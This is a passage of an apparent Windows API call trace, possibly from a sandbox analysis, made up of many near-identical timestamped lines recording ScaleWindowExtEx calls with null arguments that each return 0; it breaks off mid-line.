[0192.623] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.623] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.623] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.623] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.623] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.623] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.623] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.623] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.623] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.623] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.624] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.624] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.624] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.624] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.624] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.624] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.624] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.624] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.624] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.624] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.624] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.624] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.624] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.624] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.624] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.624] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.624] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.624] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.624] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.624] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.624] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.624] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.624] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.624] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.624] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.624] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.624] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.624] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.624] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.624] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.624] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.624] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.624] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.624] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.624] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.625] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.625] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.625] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.625] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.625] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.625] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.625] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.625] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.625] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.625] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.625] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.625] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.625] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.625] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.625] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.625] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.625] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.625] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.625] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.625] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.625] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.625] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.625] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.625] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.625] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.625] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.625] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.625] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.625] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.625] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.625] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.625] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.625] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.625] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.625] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.625] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.625] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.626] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.626] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.626] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.626] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.626] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.626] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.626] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.626] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.626] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.626] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.626] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.626] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.626] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.626] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.626] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.626] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.626] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.626] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.626] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.626] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.626] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.626] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.626] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.626] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.626] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.626] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.626] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.626] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.626] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.626] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.626] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.626] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.626] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.626] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.626] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.626] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.627] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.627] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.627] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.627] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.627] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.627] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.627] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.627] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.627] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.627] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.627] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.627] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.627] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.627] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.627] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.627] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.627] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.627] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.627] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.627] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.627] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.627] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.627] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.627] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.627] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.627] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.627] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.627] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.627] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.627] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.627] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.627] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.627] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.627] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.627] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.627] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.627] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.628] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.628] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.628] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.628] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.628] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.628] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.628] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.628] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.628] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.628] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.628] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.628] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.628] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.628] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.628] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.628] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.628] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.628] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.628] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.628] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.628] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.628] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.628] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.628] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.628] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.628] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.628] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.628] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.628] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.628] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.628] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.628] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.628] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.628] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.628] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.628] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.628] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.629] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.629] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.629] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.629] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.629] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.629] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.629] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.629] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.629] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.629] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, lpsz=0x0 | out: lpsz=0x0) returned 0 [0192.629] ScaleWindowExtEx (in: hdc=0x0, xn=0, xd=0, yn=0, yd=0, 